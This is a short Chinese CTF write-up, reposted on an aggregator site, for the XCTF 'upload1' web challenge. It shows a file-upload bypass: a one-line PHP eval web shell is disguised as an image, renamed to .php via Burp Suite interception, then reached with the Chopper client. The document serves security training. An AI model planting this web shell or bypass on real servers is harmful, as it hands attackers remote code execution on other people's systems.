攻防世界 web upload1 write up - 代码天地

攻防世界 web upload1 write up

其他 2020-10-17 08:11:50 阅读次数: 0

资料：http://39.96.86.88/2020/04/03/文件上传绕过

查看源代码发现又js代码，只能上传jpg与png格式的文件。

REQUEST包含了GET,POST,COOKIE是一个整合命令
2. 新建一个1.txt，写入php一句话:<?php @eval($_REQUEST[‘c’]);?>，然后修改后缀为.png或.jpg。然后再上传途中burp suite抓包修改后缀为.php实现对文件格式要求的绕过。
在这里插入图片描述

3. 上传成功

菜刀连接得到flag

猜你喜欢

转载自blog.csdn.net/qq_43478096/article/details/104783743

攻防世界 web upload1 write up

攻防世界 web upload1

攻防世界web进阶upload1

攻防世界upload1（web）

攻防世界 web2 write up

攻防世界WEB部分write up

攻防世界web2 write up

攻防世界WEB进阶之upload1

xctf攻防世界web新手练习区--write up

攻防世界(XCTF)WEB(进阶区)write up(四)

XCTF(攻防世界)—进阶web题Write Up(二)

XCTF(攻防世界)—进阶web题Write Up(一)

攻防世界(XCTF)WEB(进阶区)write up(一)

攻防世界web题新手练习区write up

攻防世界upload1

攻防世界 | upload1

攻防世界mobile之app1 write up

[wp] 攻防世界 upload1

bugku web题1~8 write up

攻防世界mobile新手区之easyjava write up

攻防世界（高手进阶区）——upload1

write up web:网站被黑

buuctf web write-up

write up: web login1(SKCTF) --SQL约束攻击

XCTF-Web进阶-upload1

记xctf_web upload1

Write-up-NODE-1

Write-Up-wakanda-1

攻防世界mobile新手区之app2 write up

攻防世界mobile新手区之app3 write up

今日推荐

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

周排行

Metasploit文件目录与入侵基本概念

跨域(CORS)请求问题[No 'Access-Control-Allow-Origin' header is present on the requested resource]常见解决方案

CodeIgniter 源码解读之 CodeIgniter.php（二）

SAS入门之（四）改变数据类型

初识元组

[数学建模]数学建模算法和模型（B站视频）（二）

Nginx 服务器源码安装配置流程

C#实现语音视频录制【基于MCapture + MFile】

开发进度4

下载安装vue的方法网址

每日归档

更多

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)